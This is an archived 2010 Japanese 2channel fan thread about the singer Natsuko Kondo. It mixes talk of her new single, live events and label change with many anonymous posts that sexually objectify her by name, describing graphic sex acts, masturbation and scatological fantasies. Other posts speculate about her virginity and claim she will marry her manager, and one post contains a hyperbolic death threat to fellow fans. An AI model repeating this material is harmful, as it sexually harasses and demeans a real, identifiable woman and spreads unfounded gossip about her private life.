172 :名無しの歌姫:2010/05/23(日) 13:04:00 ID:jcK5WHmSQ
奈津子とセックスしたい…近藤奈津子とwww

173 :名無しの歌姫:2010/05/26(水) 16:02:47 ID:IZ67vIr50
なつこおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおお
すきだあああああああああああああああああああああああああああああああ

174 :名無しの歌姫:2010/05/27(木) 10:14:25 ID:LnRuCPy80
しこしこしこ



うっ よかったよなつよ

175 :名無しの歌姫:2010/05/27(木) 18:21:44 ID:9T9Gf8XqQ
なつなつとセックスしたらキモチイイですか?

176 :名無しの歌姫:2010/05/27(木) 21:51:00 ID:LnRuCPy80
さいこーです
1時間くりちゃんなめてあげるよ

177 :名無しの歌姫:2010/05/29(土) 11:03:39 ID:TrY5kPkj0
なつなつとリレーつばめのグリーン個室で一緒になりたい。

178 :名無しの歌姫:2010/05/30(日) 12:34:07 ID:+72kmo7DQ
しこしこ



うっ



なつなつ愛してるよ

179 :名無しの歌姫:2010/05/30(日) 14:06:18 ID:oP1tAjQd0
ニューシングルは「はななり」かぁ。
タイトルの雰囲気から想像すると、インディーズ再出発を歌った曲かな。
どんな曲か楽しみだ。

180 :名無しの歌姫:2010/06/01(火) 18:39:09 ID:TF2UFu8kQ
しこしこ




うっ





奈津奈津









はぁはぁ

181 :名無しの歌姫:2010/06/02(水) 18:07:02 ID:L3kDTWFmQ
なつなつと性交したい…

182 :名無しの歌姫:2010/06/03(木) 04:44:02 ID:4VhkmgT/0
なつなつは処女っぽいけどどうなの?

183 :名無しの歌姫:2010/06/03(木) 19:46:54 ID:P7pQEPFYQ
んな訳ねぇだろうよwww

184 :名無しの歌姫:2010/06/03(木) 22:31:00 ID:4VhkmgT/0
嘘だ うわあああああああああああああああああああああああああああ
なつなつは清楚で可憐でやまとなでしこだと思ってたのにいいいいいいいいいいいいいい

185 :名無しの歌姫:2010/06/05(土) 07:53:37 ID:3IFQjbhFQ
しこしこしこ











どぴゅ

186 :名無しの歌姫:2010/06/05(土) 08:10:17 ID:WF+1zE/f0
d

187 :名無しの歌姫:2010/06/06(日) 00:06:24 ID:EvE06QPZ0
クロスランドおやべのライブが楽しみだ。

188 :名無しの歌姫:2010/06/06(日) 07:35:46 ID:/dOL1gikQ
なつなつのウンチ喰いたい

189 :名無しの歌姫:2010/06/06(日) 08:13:14 ID:EvE06QPZ0
>>188
なつなつはうんこしないよ

190 :名無しの歌姫:2010/06/06(日) 09:52:11 ID:HI6JKB4D0
ランドネピクニックではななり聴いた。
しっとりとした心暖まるラブソング。
曲調は恋人とか魔法とかに近いカンジかな。

191 :名無しの歌姫:2010/06/06(日) 12:48:14 ID:/dOL1gikQ
奈津代のhotexcrementに経血をケチャップにして喰らいたいなぁ… はぁはぁ

192 :名無しの歌姫:2010/06/06(日) 17:33:14 ID:/dOL1gikO
hotexcrementって何?

193 :名無しの歌姫:2010/06/07(月) 01:42:13 ID:XKTrLUvG0
>>190
なっちゃんは、きっと今いい恋をしてるんでしょうね。

194 :名無しの歌姫:2010/06/07(月) 15:37:11 ID:gwTLV4lq0
なつは処女じゃないのか?

195 :名無しの歌姫:2010/06/07(月) 19:07:04 ID:FT/ask/8O
www↑童貞

196 :名無しの歌姫:2010/06/07(月) 20:34:52 ID:gwTLV4lq0
漏れの童貞はなつなつに捧げるお
もう38年間守ってるお!

197 :名無しの歌姫:2010/06/08(火) 19:34:35 ID:KZCgdatLO
ど童貞www

198 :名無しの歌姫:2010/06/10(木) 00:44:58 ID:crv7vasKO
夏代

199 :名無しの歌姫:2010/06/10(木) 22:27:45 ID:crv7vasKO
香津代

200 :名無しの歌姫:2010/06/10(木) 23:22:09 ID:iqnq1lWY0
なちゅなちゅ!おれの童貞をなちゅなちゅの騎乗位で奪っておくれ!

201 :名無しの歌姫:2010/06/11(金) 19:15:29 ID:omUvY9jiO
なつなつは童貞嫌いだよwww

202 :名無しの歌姫:2010/06/12(土) 10:22:53 ID:us+tHVsVQ
なつなつとアナルセックスを愉しみたひ

203 :名無しの歌姫:2010/06/12(土) 15:28:25 ID:HgxF76Fw0
なつなつと駅弁ファックしたい。もちろん、なつなつが馬乗りで。

204 :名無しの歌姫:2010/06/12(土) 21:21:11 ID:us+tHVsVO
なつなつとセックルを愉しみたひ

205 :名無しの歌姫:2010/06/13(日) 19:24:04 ID:Tdc7kTp20
ライブ行ってきた。
新曲、お世辞とか贔屓目なしで全部よかったよ。
全体を通しても素晴らしいライブで、改めていいアーティストだと感じた。

206 :名無しの歌姫:2010/06/13(日) 20:16:34 ID:DKUMdw7w0
まじかー。火曜日が楽しみになってきた。

207 :名無しの歌姫:2010/06/13(日) 21:26:52 ID:GkkqRSfx0
ユニバーサルから離れてほんと良かった

208 :名無しの歌姫:2010/06/13(日) 23:36:52 ID:Tdc7kTp20
オレもホントに離れてよかったと思ったよ。
なっちゃんは下手に泣き歌だとかのコンセプトに縛られるとあまりいいものは出来ない。
むしろ自分で伝えたい歌や作りたい歌を素直に作った方が、逆に感動させられるものが出来る。

209 :名無しの歌姫:2010/06/14(月) 09:35:06 ID:cVdmZDFz0
エイベックスに移籍なんて話はないのかな?

210 :名無しの歌姫:2010/06/17(木) 09:49:09 ID:MlOseyIgO
一応無関係ではない
http://live28.2ch.net/test/read.cgi/mnewsplus/1276723633/

211 :名無しの歌姫:2010/06/17(木) 19:13:14 ID:eRUefk9wO
まったく関係ない

212 :名無しの歌姫:2010/06/19(土) 18:42:04 ID:8/Xub/dZ0
明日、クロスランドおやべに行く人はいるの?

213 :名無しの歌姫:2010/06/19(土) 19:33:37 ID:AVZ9sZUvO
いるけど何か?

214 :名無しの歌姫:2010/06/26(土) 08:08:34 ID:kfFd5hE10
新曲マダー?

215 :名無しの歌姫:2010/06/26(土) 11:52:24 ID:6CfP335wQ
セックスしたい。

216 :名無しの歌姫:2010/06/29(火) 19:07:39 ID:KVTsSKfCQ
なつなつの手を握った感触を忘れないぃぃぃい

217 :名無しの歌姫:2010/06/29(火) 22:12:46 ID:DXY4aGFO0
おれのなつにオナった手で触るんじゃねえ

218 :名無しの歌姫:2010/06/29(火) 23:51:42 ID:SctIgTEu0
あの握手システムに違和感を感じてしまう

219 :名無しの歌姫:2010/06/30(水) 00:06:55 ID:kkG7FQfX0
どんな違和感を感じるんだ?w
ファンに感謝の意味を込めての握手だろ。

220 :名無しの歌姫:2010/06/30(水) 15:31:03 ID:wQ8pS+h90
童貞どものアイドルだから

221 :名無しの歌姫:2010/06/30(水) 18:55:13 ID:zZsTfupLO
なつなつは処女だよね?

222 :名無しの歌姫:2010/06/30(水) 23:30:15 ID:wQ8pS+h90
>>221
っったりめぇだろぉ
キスもまだだよ

223 :名無しの歌姫:2010/07/01(木) 12:29:36 ID:WXWAxQGo0
生まれ変わったら、なつなつが座る椅子になりたい

224 :名無しの歌姫:2010/07/01(木) 19:35:03 ID:Y52ztFBo0
なつの彼氏は誰なんだ?


225 :名無しの歌姫:2010/07/02(金) 02:37:37 ID:D1A4N1jDO
つマネ

226 :名無しの歌姫:2010/07/02(金) 19:45:20 ID:D1A4N1jDO
つマネ

227 :名無しの歌姫:2010/07/03(土) 14:45:18 ID:QGcEH3shO
つマネ

228 :名無しの歌姫:2010/07/03(土) 15:45:56 ID:uSHq4N7G0
コピペ

残念ながら、各店舗、1枚ずつもしくは、1枚も置いていないという可能性大です。
ほしいと思ってくださっている方、ぜひご予約お願いします!
発売日の2週間くらい前には予約しないと、発売日に入荷しない可能性もあるそうです。

フリーライブの時にCDまともに揃えられるのか?


229 :名無しの歌姫:2010/07/03(土) 16:54:50 ID:B46Mm0Ix0
フリーライブはCD山積みにされてるぞ

230 :名無しの歌姫:2010/07/03(土) 23:54:07 ID:wDhlFLbJ0
http://www.ishinoda.com/archives/2010/07/post_552.html
なつこかわひい

231 :名無しの歌姫:2010/07/07(水) 13:13:36 ID:1ms/UXdH0
この中で四谷行った事ある人はどれだけ残っているの?



232 :名無しの歌姫:2010/07/10(土) 03:05:23 ID:DH8zCQ+UQ
最近元気な稻

233 :名無しさん@そうだ選挙に行こう:2010/07/11(日) 21:13:52 ID:ZfhSgTd30
『まっすぐに』がやけに色っぽい歌い方だなぁ
悪くない、もっとやれ

234 :名無しの歌姫:2010/07/12(月) 14:01:31 ID:0nuZ3pRT0
試聴できるけどオマエラお気に入りはどれよ

235 :名無しの歌姫:2010/07/12(月) 17:03:07 ID:gvWwRhs/0
「温度」最高。

236 :名無しの歌姫:2010/07/12(月) 19:31:29 ID:cwVBDFdnQ
エロ路線で売ればヒットする

237 :名無しの歌姫:2010/07/17(土) 07:53:56 ID:lZK2aUfNQ
シャイニングとエッチしたい

238 :名無しの歌姫:2010/07/17(土) 16:08:00 ID:IA8D5LFz0
来週、西宮に行く人はいるの?

239 :名無しの歌姫:2010/07/17(土) 16:10:19 ID:NaoX66aSP
俺の奈津代を見るために行くぞ!西宮は俺の聖地だ!!
俺の奈津代と初めて会った場所だ!! 
CDは買わないがな!生で俺の奈津代を見たい!
俺の奈津代ーーー!!!待っててねーー!!

240 :名無しの歌姫:2010/07/18(日) 07:32:09 ID:H4nmOoqJ0
>>239
自分は奈津代を初めて逢ったのは金沢にあるFM石川のスタジオ前だよ。
そこで奈津代にサインをもらった事もある。
来週、西宮に行くよ!なつなつ待っててね(^-^)

241 :名無しの歌姫:2010/07/18(日) 08:22:05 ID:anjhQC/s0
海岸にゴミ拾いに行く人はいるの?

242 :名無しの歌姫:2010/07/18(日) 17:57:41 ID:wnSiiL4Q0
この子処女っぽいよね?

243 :名無しの歌姫:2010/07/21(水) 02:08:16 ID:R1lBoTCG0
はななりの「あなた」って、あのマネージャーさんっていう解釈でいいのでしょうか。

244 :名無しの歌姫:2010/07/21(水) 02:54:30 ID:1UYRBo5T0
>>243
もうすぐマネージャーと結婚するよ

245 :名無しの歌姫:2010/07/21(水) 03:22:21 ID:cP71AWCuP
もうすぐ西宮で俺の奈津代に会えるな!!
CDは買わないけども!!俺の奈津代の顔が見れたらそれでいいw


246 :名無しの歌姫:2010/07/21(水) 03:33:32 ID:1UYRBo5T0
>>245
なつと握手した瞬間に射精すんなよ!!

247 :名無しの歌姫:2010/07/21(水) 17:44:39 ID:wfXK2IBa0
CDの感想すらないこのスレって・・・

248 :名無しの歌姫:2010/07/21(水) 18:50:59 ID:cP71AWCuP
おれの奈津代は、音楽というより、その美貌・可愛さ・容姿、要するに神がかった外見に惹かれたファンが多いんだろう。
おれの奈津代だからな、可愛いに決まってる。

おれの奈津代が見られるまであと3日!!

249 :名無しの歌姫:2010/07/22(木) 08:19:35 ID:KTqpmy5OQ
なつなつと燃えるような野外エッチしたい

250 :名無しの歌姫:2010/07/22(木) 11:39:45 ID:ao2xzGGr0
最近アコギを始めて,アルフィーの坂崎さんが教える「アコギの教科書」って教則本を買った。


付属のDVDで見る坂崎さんは石野田さんに似ていた。眼鏡と髪型とギターよ…。

251 :名無しの歌姫:2010/07/23(金) 03:26:38 ID:dx/wCkzzP
ミクシ、俺の奈津代から足跡付けられてるwwww
止めてくれよwww見るなよwww

以前も「俺の奈津代(*´Д`)'`ァ'`ァ 手を握った(*´Д`)'`ァ'`ァ 俺の奈津代萌え」ってな内容の時に踏まれたんだぞwww
今回も似たような内容だwww

252 :名無しの歌姫:2010/07/23(金) 05:09:35 ID:unk+hLrdP
特定されたなw

253 :名無しの歌姫:2010/07/23(金) 10:02:46 ID:MIVKk92JO
馬鹿だwwwww

254 :名無しの歌姫:2010/07/23(金) 17:23:58 ID:MIVKk92JO
今日は難波の日、明日は西宮の日
梅田タワレコでCD買ったら整理券20番だった
さすが大阪、けっこう売れてんだね

255 :名無しの歌姫:2010/07/24(土) 02:04:59 ID:iplGsc3UP
俺の奈津代まで、あと11時間だな!気合入れていくぞぉぉぉーー!!!
声を出していくぞぉぉぉーー!!!

おめぇら!!!俺の奈津代が登場したら「奈津代ーーー!!!」って叫ばねぇと、ぶちころすぞ!!!

256 :名無しの歌姫:2010/07/24(土) 05:10:04 ID:ul/GgP3y0
今日はサンダーバード4号に乗って西宮に行くよ!CDはあるか分からないけど…
なつなつ待っててね!(^-^)


257 :名無しの歌姫:2010/07/24(土) 06:53:39 ID:Bez6yaF7Q
なつなつと握手したいぃいいいい!!なつなつぅうううう!!

258 :名無しの歌姫:2010/07/24(土) 08:53:19 ID:iplGsc3UP
>>256
心配せずともフリーライブの時はCDが山積みだ!!
気にせず10枚くらい買ってくれ!!

259 :名無しの歌姫:2010/07/24(土) 14:08:10 ID:MDu8InnPO
布教のために友達誘ってイベント行ったんだが、『30』を聴いて
「リルラリルハやな」とあっさり言いやがった
ホンマや…っ!!どっか耳馴染んだ曲だなぁと思ってはいたが、カエラだったか

260 :名無しの歌姫:2010/07/24(土) 16:34:47 ID:iplGsc3UP
やっぱり俺の奈津代は最高だ!
さすがは俺の奈津代!
奈津代を見ながらパンツに手を突っ込んでしまってたくらいだ。

冗談はさておき、あまりの暑さに俺の奈津代をあんまり見てなかったw
汗がダラダラでそれどころではw
CDも買わなかったけど、俺の奈津代を生で見れたことだけに意義がある!

261 :名無しの歌姫:2010/07/24(土) 16:58:00 ID:MDu8InnPO
CD買えよ
もう持ってるならまだしも、今回のアルバムは普通におすすめの良作だぞ

262 :名無しの歌姫:2010/07/24(土) 22:48:40 ID:68orZ1SqP
既存曲に金払うのはもったいない気もする
レンタルでるかな

263 :名無しの歌姫:2010/07/24(土) 23:05:35 ID:iplGsc3UP
正直、俺の奈津代の歌声、最初は良いかなぁと思ったけど、すぐに飽きたというか、なんか違うなぁ・・・って・・・。
だからCD買わなかった。
けど、俺の奈津代は可愛いし話も面白いしで生で見たかったのでライブに行った。

264 :名無しの歌姫:2010/07/25(日) 06:45:08 ID:8BeuK6JFQ
ファンの資格ねぇじゃん

265 :名無しの歌姫:2010/07/25(日) 15:54:51 ID:WPQydEf0O
タイムリミットがかなり良いな
イズミカワソラの編曲、やりおる

266 :名無しの歌姫:2010/07/26(月) 08:32:31 ID:1TSYnpvi0
「一生は70年ぐらいで一年は365日」とか
「この地球上には60億もの人がいて1秒間に一人ずつ会ったら190年かかるという」とか


単価計算好きねこの娘。会計のセンスあるキャモ!

267 :名無しの歌姫:2010/07/26(月) 08:57:10 ID:sxSBQI9E0
土曜日に西宮に寄った。生の奈津代は先月の富山(クロスランドおやべ)以来だった。
生の奈津代はいつ見てもいいもんだよ。もちろんCD買って握手をしてもらったよ。

268 :名無しの歌姫:2010/07/27(火) 03:49:40 ID:OTp+Ni2J0
奈津子のお手手は精液まみれwww

269 :名無しの歌姫:2010/07/31(土) 16:22:17 ID:LGwdXINh0
>>268
なつよのお手手はうんこまみれかもよw

42 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)